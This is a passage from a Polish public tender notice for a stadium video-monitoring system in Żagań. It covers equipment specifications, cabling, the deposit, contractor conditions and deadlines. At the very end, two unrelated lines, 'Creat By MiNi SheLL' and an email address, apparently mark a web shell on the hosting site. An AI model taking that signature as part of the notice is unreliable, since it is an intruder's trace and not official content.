-	możliwość zasilania: PoE (PowerOverEthernet), 12 VDC
-	standard interfejsu sieciowego: 100BASE-TX
-	możliwość pracy w zakresie temperatur od -10 st. C. do +50 st. C. lub szerszym
obudowa:
-	osłona przeciwsłoneczna
-	obudowa wyposażona w grzałkę (zasilanie 230 VAC)
-	uchwyt ścienny
Obiektyw:
-	ogniskowa dobrana odpowiednio do pola widzenia kamery
-	przystosowany do kamer multimegapikselowych
-	przystosowany do kamer o wielkości matrycy co najmniej 1/2,5
-	mocowanie typu C/CS

-	ilość: 11
System audio
koder:
-	kodery audio IP
-	kompresja audio G.711 PCM 8 kHz 
-	zasilanie: poprzez PoE, 24 VAC lub 12 VDC
-	standard interfejsu sieciowego: 100BASE-TX
-	możliwość pracy w zakresie temperatur od -10 st. C. do +50 st. C. lub szerszym
-	kodery audio muszą być wyposażone w elementy do montażu w szafie rack 19
-	ilość koderów należy dobrać tak, aby obsłużyły sygnały ze wszystkich mikrofonów
mikrofon:
-	mikrofon kierunkowy
-	pasmo przenoszenia 20Hz - 16kHz lub większe
-	możliwość pracy w zakresie temperatur od -20 st. C. do +45 st. C. lub szerszym

-	ilość: 6 kanałów audio
Serwer rejestrujący
-	Procesor Quad Core IntelR XeonR 2.0 GHz lub szybszy
-	Pamięć RAM co najmniej 4 GB (min. 1066MHz)
-	2 Porty sieciowe Ethernet 1 Gb/s
-	Zintegrowana karta graficzna
-	Wewnętrzny napęd DVD-ROM lub DVD-RW
-	Co najmniej cztery porty USB 2.0
-	Wewnętrzna przestrzeń dyskowa co najmniej 9,3 TB w konfiguracji macierzy RAID5
-	Dyski twarde klasy enterprise - dedykowane do pracy w serwerach
-	Montaż w szafie rack 19, wysokość maks. 2U
-	Redundantne wentylatory i  zasilacze 
-	Możliwość zapisu ciągłego strumienia danych o przepływności co najmniej 32 MB/sek
-	System operacyjny MicrosoftR WindowsR XP Professional 64-bit lub MicrosoftR WindowsR Server 2008 R2.

-	Ilość: 3 szt.
Stacja operatorska z obsługą dwóch monitorów
-	obudowa typu desktop
-	system operacyjny MicrosoftR WindowsR XP Professional 64-bit lub nowszy 64-bit
-	procesor Quad Core IntelR XeonR 2.0 GHz lub wydajniejszy
-	pamięć RAM 4GB lub więcej
-	interfejs sieciowy Gigabit Ethernet RJ-45 port (1000Base-T)
-	wyjście wideo 2xDVI (lub display port)
-	napęd optyczny DVD-RW
-	klawiatura USB
-	myszka USB
-	kabel zasilający
-	Warunki pracy: od 10°C do 35°C
-	Warunki przechowywania: od -40°C do 65°C

-	Ilość: 2 szt.
Monitor
-	Monitor LCD o wielkości co najmniej 21 cali
-	Rozdzielczość co najmniej FullHD (1920x1080)
-	Wejście wideo: co najmniej 1xDVI

-	Ilość: 4 szt.
Panel operatorski
-	podłączany do stacji operatorskiej poprzez port USB
-	joystick do sterowania głowicami obrotowymi
-	pokrętło do szybkiego przeglądania materiału audio-wideo
-	co najmniej 30 programowalnych podświetlanych przycisków
-	możliwość przystosowania dla osób prawo- i leworęcznych
-	możliwość wydrukowania nakładki z opisem przycisków

-	Ilość: 2 szt.
I.	 Okablowanie
W projekcie przewidziano układanie kabli światłowodowych wielomodowych oraz kabli miedzianych UTP. Wszystkie kable typu zewnętrznego tzn. odpornego na działanie warunków atmosferycznych. Kable należy układać w kanale technologicznym istniejącym i nowo budowanym.
Odcinki zewnętrzne (doprowadzenie do kamer) należy zabezpieczyć odpowiednimi rurami osłonowymi zabezpieczającymi przed uszkodzeniami. Podłączenia do kamer zlokalizowanych na elewacjach istniejących budynków należy wykonać podtynkowo w rurach osłonowych i odtworzyć istniejącą elewację. Niedopuszczalne jest montowanie instalacji natynkowo!!!
Kable światłowodowe należy zakończyć na przełącznicach światłowodowych wyposażonych w złącza standardu SC.
Do każdej kamery IP należy doprowadzić jeden kabel UTP i zasilanie elektryczne gwarantowane
Wszystkie kable od poszczególnych sekcji kamer schodzą się do punktów konsolidacyjnych, w których znajdują się koncentratory z modułem FO. Z każdego pkt konsolidacyjnego do szafy CCTV należy doprowadzić kable światłowodowe 8G 50/125, z zarobionymi 4 włóknami światłowodowymi.
W trakcie instalacji kabla należy zwracać uwagę na zachowanie promieni gięcia i właściwą ochronę kabla przed mechanicznym uszkodzeniem powłoki zewnętrznej. 
Zapasy kabla wykonać  w formie zwojów o promieniach gięcia nie mniejszych niż zaleca producent muszą być dodatkowo związane opaskami kablowymi, w co najmniej 4 miejscach na obwodzie zwoju. 
Kable światłowodowe nie mogą być układane i instalowane na płycie dennej studni kablowej. 
Szafa CCTV zostanie połączona z istniejącym punktem dozoru wizyjnego w budynku basenu kablem światłowodowym 8G 50/125, z zarobionymi 4 włóknami światłowodowymi, zakończonych na panelach FO.
J.	 Budowa kanalizacji teletechnicznej
Należy wykonać nowy odcinek kanalizacji teletechnicznej jednootworowej na trasie jak zaznaczono na rysunku
Przyłącze do budynku centrum monitoringu zlokalizowano w pobliżu wejścia głównego od strony boiska.
Studnie kablowe
Studnie kablowe SK wykonać w formie prefabrykatów do składania, o tak ukształtowanych powierzchniach stykowych, aby umożliwiały prawidłowy i szczelny montaż elementów, zewnętrzne powierzchnie pokryte bitumiczną masą izolacyjną. Rury kanalizacji pierwotnej wprowadzać  równo z powierzchnią gardła, miejsca styku wypełnić masa betonową.
Kanalizacja pierwotna
Kanalizację teletechniczną wybudować jako jednootworową z rur o konstrukcji dwuwarstwowej z zewnętrzną warstwą karbowaną i wewnętrzną poślizgową ułatwiającą zaciąganie kabli wykonana z polietylenu wysokiej gęstości o średnicy zewnętrznej 75.0 mm i grubości ścianki 7mm; DVR75/7.0; łączenie rur poprzez stosowanie złączek. Każdą rurę wprowadzoną do studni kablowej wyposażyć w uszczelki końców rur. 
Rury ułożone na głębokości minimum 0.6m do górnej powierzchni kanalizacji.
Wprowadzenie kanalizacji do budynku
Wprowadzenie kanalizacji kablowej wykonać poprzez filtr piaskowy 100x100x35 - piasek drobny, jednorodny..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 35.12.35.00-7, 45.31.70.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 8. WADIUM 
8.1. Zamawiający żąda wniesienia wadium.
8.2. Wadium w wysokości 12 000,00 PLN (słownie: dwanaście tysięcy złotych) należy wnieść przed upływem terminu składania ofert. 
8.3. Wadium należy wnieść w jednej z niżej wymienionych form: 
1) pieniądzu; 
2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy 
    oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze 
    poręczeniem pieniężnym; 
 3) gwarancjach bankowych; 
 4) gwarancjach ubezpieczeniowych; 
 5) poręczeniach udzielanych przez podmioty, o których mowa w art.6b 
     ust.5 pkt.  2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej 
     Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz.275). 
8.4. Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek 
bankowy wskazany przez zamawiającego Nr: 
       BPS S.A. o w Legnicy 23 1930 1044 2280 0254 1534 0001 
z dopiskiem (WADIUM - ZAMÓWIENIE PUBLICZNE, WYKONANIE SYSTEMU MONITORINGU STADIONU SPORTOWEGO W ŻAGANIU) i przechowuje się na tym rachunku. 
8.5. Wadium wniesione w pieniądzu uznaje się za wniesione w sposób 
prawidłowy, gdy kwota wadium zostanie zaksięgowana  na wskazanym
koncie Zamawiającego nie później, jak przed upływem terminu składania 
ofert.
8.6. Zamawiający zwraca niezwłocznie wadium, jeżeli : 
1) upłynął termin związania ofertą; 
2) zawarto umowę w sprawie zamówienia publicznego i wniesiono 
    zabezpieczenie należytego wykonania tej umowy;
3) zamawiający unieważnił postępowanie o udzielenie zamówienia, a 
    protesty zostały ostatecznie rozstrzygnięte lub upłynął termin do ich 
    wnoszenia.  
8.7. Zamawiający zwraca niezwłocznie wadium na wniosek wykonawcy: 
1) który wycofał ofertę przed upływem terminu składania ofert; 
2) który został wykluczony z postępowania; 
3) którego oferta została odrzucona. 
8.8. Zamawiający żąda ponownego wniesienia wadium przez wykonawców, 
którym zwrócono wadium na podstawie  pkt.  8.7 ppkt. 2 i 3 SIWZ, jeżeli w 
wyniku ostatecznego rozstrzygnięcia protestu unieważniono czynność 
wykluczenia wykonawcy lub odrzucenia oferty. Wykonawcy wnoszą 
wadium w terminie określonym przez zamawiającego.
8.9. Wadium wniesione w pieniądzu zamawiający zwraca wraz z odsetkami 
wynikającymi z umowy rachunku bankowego, na którym było ono 
przechowywane, pomniejszone o koszty prowadzenia rachunku 
bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek  
bankowy wskazany przez wykonawcę.    
8.10.Zamawiający zatrzymuje wadium wraz z odsetkami jeżeli : 
1) wykonawca w odpowiedzi na wezwanie /o uzupełnienie oświadczeń, 
    dokumentów lub pełnomocnictw, zgodnie z art.26 ust.3 i art.25 ust.1 
    Ustawy  Prawo zamówień publicznych/ nie złożył żądanych 
    dokumentów, oświadczeń czy też pełnomocnictw, chyba że udowodni, 
     że wynika to z przyczyn nie leżących po jego stronie.
8.11.Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, 
 którego oferta została wybrana: 
   1) odmówił podpisania umowy w sprawie zamówienia publicznego na 
        warunkach określonych w ofercie; 
   2) nie wniósł wymaganego zabezpieczenia należytego wykonania umowy; 
   3) zawarcie umowy w sprawie zamówienia publicznego stało się 
       niemożliwe z przyczyn leżących po stronie wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie  posiadania  przez Wykonawcę uprawnień do wykonywania określonej    działalności lub czynności, Zamawiający nie żąda od Wykonawcy  potwierdzenia posiadania uprawnień do wykonywania działalności, gdyż przepisy prawa nie nakładają  obowiązku posiadania takowych uprawnień.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie  posiadania wiedzy i doświadczenia Zamawiający uzna za spełniającego ten wymóg, Wykonawcę, który w okresie ostatnich pięciu lat przed upływem składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał co najmniej 1 zadanie w przedmiotowym zakresie robót. Na potwierdzenie spełnienia tego warunku Wykonawca złoży wraz z ofertą  dokument  określony  w punkcie 6.1 podpunkt 2 SIWZ wraz z załączonymi  do niego dokumentami potwierdzającymi, że roboty te zostały wykonane zgodnie  z zasadami  sztuki  budowlanej i prawidłowo ukończone. Wykonawcy występujący wspólnie o udzielenie zamówienia publicznego mogą spełnić powyższy warunek łącznie. Wykonawca może polegać na  wiedzy i doświadczeniu innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków.  Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu  zamówienia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi  do wykonania zamówienia, Zamawiający uzna za spełniającego te wymogi  tego Wykonawcę, który będzie dysponował osobą uprawnioną do kierowania robotami w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń. Na potwierdzenie spełnienia tego warunku, Wykonawca złoży wraz z ofertą dokument określony w  punkcie 6.1 podpunkt 3 SIWZ. Wykonawcy występujący wspólnie  powyższy warunek mogą spełnić łącznie. W zakresie dysponowania  odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania  zamówienia Wykonawca może polegać na potencjale innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji  zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności  przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji  niezbędnych  zasobów na okres  korzystania z nich przy wykonywaniu zamówienia, oraz składając   dokumenty  określone w punkcie 6.1. podpunkt 4 SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca  jest   zobowiązany wykazać Zamawiającemu,  że  brak  jest  podstaw    do  
wykluczenia go z postępowania z powodu niespełnienia warunków, o których mowa  w art.  24 ust.1Ustawy Prawo  zamówień publicznych. W tym celu  Wykonawca składa wraz z ofertą oświadczenie o braku podstaw do wykluczenia go z postępowania z powodu niespełnienia warunków określonych w   art.24 ust.1 Ustawy Prawo zamówień publicznych  oraz składa  stosowne   dokumenty  określone w punkcie 6 SIWZ dot. wykazu oświadczeń i dokumentów, jakie dostarczyć mają Wykonawcy, w celu potwierdzenia spełnienia warunków udziału w postępowaniu. Wykonawcy występujący wspólnie  warunek braku podstaw do wykluczenia z postępowania muszą spełnić oddzielnie. 

5.7.Na podstawie art. 24, ust. 1 Ustawy Prawo zamówień publicznych z postępowania o udzielenie zamówienia wyklucza się : 
       1) Wykonawców, którzy wyrządzili szkodę nie wykonując zamówienia lub wykonując je 
            nienależycie, jeżeli szkoda ta została stwierdzona orzeczeniem sądu, które 
           uprawomocniło się w okresie 3 lat przed  wszczęciem postępowania;  
   2) Wykonawców, w stosunku do których otwarto likwidacje lub których  upadłość
       ogłoszono, z wyjątkiem  Wykonawców, którzy po ogłoszeniu upadłości zawarli układ 
       zatwierdzony prawomocnym postanowieniem sądu, jeżeli układ nie  przewiduje 
       zaspokojenia wierzycieli poprzez likwidację majątku upadłego;
       3) Wykonawców, którzy zalegają z uiszczeniem podatków, opłat lub składek na 
           ubezpieczenie społeczne lub zdrowotne, z wyjątkiem przypadków, gdy uzyskali oni 
           przewidziane prawem zwolnienie, odroczenie, rozłożenie na raty  zaległych płatności 
           lub wstrzymanie w całości wykonania decyzji właściwego organu;
       4) osoby fizyczne, które prawomocnie skazano za przestępstwo popełnione w  związku 
           z postępowaniem o udzielenie zamówienia, przestępstwo przeciwko  prawom osób 
           wykonujących pracę zarobkową, przestępstwo przeciwko  środowisku, przestępstwo 
           przekupstwa, przestępstwo przeciwko obrotowi  gospodarczemu lub inne 
           przestępstwo popełnione w celu osiągnięcia korzyści  majątkowych, a także za 
           przestępstwo  skarbowe lub przestępstwo udziału w  zorganizowanej grupie albo 
           związku  mających na celu popełnienie przestępstwa lub przestępstwa  skarbowego; 
       5) spółki jawne, których wspólnika prawomocnie skazano za przestępstwo  popełnione w 
           związku z postępowaniem o udzielenie zamówienia, przestępstwo przeciwko prawom 
           osób wykonujących pracę zarobkową, przestępstwo przeciwko środowisku, 
           przestępstwo przekupstwa, przestępstwo przeciwko obrotowi gospodarczemu lub 
           inne przestępstwo popełnione w celu osiągnięcia  korzyści majątkowych, a także za 
           przestępstwo skarbowe lub przestępstwo udziału w zorganizowanej  grupie albo 
           związku mających na celu popełnienie przestępstwa lub przestępstwa skarbowego; 
      6) spółki partnerskie, których partnera lub członka zarządu prawomocnie skazano za 
           przestępstwo popełnione w związku z postępowaniem o udzielenie zamówienia, 
           przestępstwo przeciwko prawom osób wykonujących pracę zarobkową, przestępstwo 
           przeciwko  środowisku, przestępstwo przekupstwa, przestępstwo przeciwko obrotowi 
           gospodarczemu lub inne przestępstwo popełnione w celu osiągnięcia korzyści 
           majątkowych, a także za przestępstwo skarbowe lub przestępstwo udziału w 
           zorganizowanej  grupie albo związku  mających na celu popełnienie przestępstwa lub  
           przestępstwa   skarbowego; 
       7) spółki komandytowe oraz spółki komandytowo-akcyjne, których komplementariusza 
           prawomocnie skazano za przestępstwo popełnione w  związku z postępowaniem o 
           udzielenie zamówienia, przestępstwo przeciwko  prawom osób wykonujących pracę 
           zarobkową,  przestępstwo przeciwko środowisku, przestępstwo przekupstwa, 
           przestępstwo przeciwko obrotowi  gospodarczemu lub inne przestępstwo popełnione 
           w celu osiągnięcia korzyści majątkowych, a także za przestępstwo  skarbowe lub 
           przestępstwo udziału w zorganizowanej grupie albo związku mających na celu 
           popełnienie przestępstwa lub przestępstwa skarbowego; 
      8) osoby prawne, których urzędującego członka organu zarządzającego prawomocnie 
          skazano za przestępstwo popełnione w związku z postępowaniem o udzielenie 
          zamówienia, przestępstwo  przeciwko prawom osób wykonujących pracę zarobkową, 
          przestępstwo przeciwko środowisku, przestępstwo przekupstwa, przestępstwo 
          przeciwko obrotowi gospodarczemu lub inne przestępstwo  popełnione w celu 
          osiągnięcia korzyści majątkowych, a także za przestępstwo skarbowe lub 
          przestępstwo udziału w zorganizowanej  grupie albo związku mających na celu 
          popełnienie przestępstwa lub  przestępstwa  skarbowego; 
      9) podmioty zbiorowe, wobec których sąd orzekł zakaz ubiegania się o  zamówienia, na 
          podstawie przepisów o odpowiedzialności podmiotów  zbiorowych za czyny 
          zabronione pod groźbą kary.

5.8.Z postępowania o udzielenie zamówienia publicznego wyklucza się na  podstawie art.24 
ust.2 również Wykonawców, którzy: 
1)	wykonywali bezpośrednio czynności związane z przygotowaniem prowadzonego 
           postępowania lub posługiwali się w celu sporządzenia oferty osobami 
          uczestniczącymi w dokonywaniu tych  czynności, chyba że udział tych Wykonawców w 
          postępowaniu nie utrudni uczciwej  konkurencji;
2) nie wnieśli wadium do upływu terminu składania ofert, na przedłużony okres związania     
    ofertą lub w terminie, o którym mowa w art. 46 ust.3 Ustawy Prawo zamówień 
    publicznych /gdy Zamawiający żąda wniesienia wadium/, albo nie zgodzili się na 
    przedłużenie okresu związania ofertą; 
     3) złożyli nieprawdziwe informacje mające wpływ lub mogące mieć wpływ na wynik 
         prowadzonego postępowania; 
     4) nie wykazali spełnienia  warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie sytuacji ekonomicznej i finansowej, Zamawiający uzna za spełniającego te wymogi tego Wykonawcę, który  będzie ubezpieczony   od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej związanej z przedmiotem zamówienia  i na potwierdzenie spełnienia tego warunku złoży wraz z ofertą  dokument określony w  punkcie 6.1. podpunkt 5 SIWZ. Wykonawcy występujący wspólnie  powyższy warunek mogą spełnić łącznie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający - na podstawie art.144 ust.1 i 2 Ustawy Prawo zamówień  publicznych dopuszcza możliwość zmian postanowień zawartej umowy w   stosunku do treści oferty na podstawie, której dokonano wyboru Wykonawcy: 
    1)  w zakresie wydłużenia terminu obowiązywania umowy, pod warunkiem że:  
         - zachodzi konieczność wykonania robót dodatkowych na zadaniu o wykonanie robót 
         budowanych, których wykonanie w sposób obiektywny uniemożliwia  terminowe 
         zakończenie realizacji przedmiotu zamówienia,  
         - prace objęte umową o wykonanie robót budowlanych zostały wstrzymane  przez 
         właściwe organy z przyczyn niezależnych od Wykonawcy lub też   wystąpiły warunki 
         atmosferyczne, które ze względów obiektywnych  uniemożliwiają wykonanie robót 
         budowlanych zgodnie z normami   techniczno- budowlanymi, co uniemożliwia 
         terminowe zakończenie realizacji  przedmiotu  umowy,
         - zachodzi konieczność uzyskania niemożliwych do przewidzenia na etapie planowania 
         inwestycji o wykonanie robót budowlanych danych, zgody osób trzecich  lub 
         właściwych organów;
2) w przypadku ograniczenia lub wyłączenia z realizacji przez Zamawiającego robót składających się na przedmiot umowy, wynagrodzenie określone w § 5, ust. 1 i 2 może ulec zmniejszeniu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.palac.zagan.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> PAŁAC KSIĄŻĘCY Sp. z o.o. w Żaganiu, ul Szprotawska 4, 68-100 Żagań, tel. 068-477-64-64, 068-477-64-84, fax. 068-477-64-62.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.10.2011 godzina 11:00, miejsce: PAŁAC KSIĄŻĘCY Sp. z o.o. w Żaganiu, ul Szprotawska 4, 68-100 Żagań, sekretariat - pok. 269.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Przedmiot zamówienia jest finansowany: 
- ze środków własnych,
- z kredytu bankowego..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com